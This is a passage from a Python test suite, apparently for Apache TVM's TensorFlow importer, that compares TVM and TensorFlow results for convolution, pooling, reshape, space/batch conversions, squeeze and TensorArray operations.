pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@pytest.mark.skip(reason="See https://github.com/apache/tvm/issues/10275")
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution with given shapes and attributes"""
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
"""One iteration of 3D convolution transpose with given shapes and attributes"""
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
"""One iteration of biasadd with given shapes and attributes"""
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
# make paddings an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
"""One iteration of reshape operation with given data and out shape"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
"""relay.expr.Call as shape"""
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
"""A special case for reshape."""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
"""One iteration of depth_to_space operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
"""One iteration of space_to_depth operation with given data and block size"""
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
"""One iteration of squeeze"""
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
"""Squeeze"""
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
ta0 = _construct_scatter(dtype, dtype_str, element_shape, infer_shape, 3)
out0 = ta0.read(0)
out1 = ta0.read(1)
out2 = ta0.read(2)
ta1 = _construct_scatter(dtype, dtype_str, element_shape, infer_shape, 4)
out4 = ta1.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0", out4.name], mode="vm")
def _construct_scatter(dtype, dtype_str, element_shape, infer_shape, size):
arr = [[float(i)] for i in range(size)]
indices_arr = [i for i in range(size - 1, -1, -1)]
t = tf.constant(np.array(arr).astype(dtype_str), dtype=dtype)
indices = tf.constant(indices_arr)
ta1 = tf.TensorArray(
dtype=dtype, size=size, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
return ta2
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
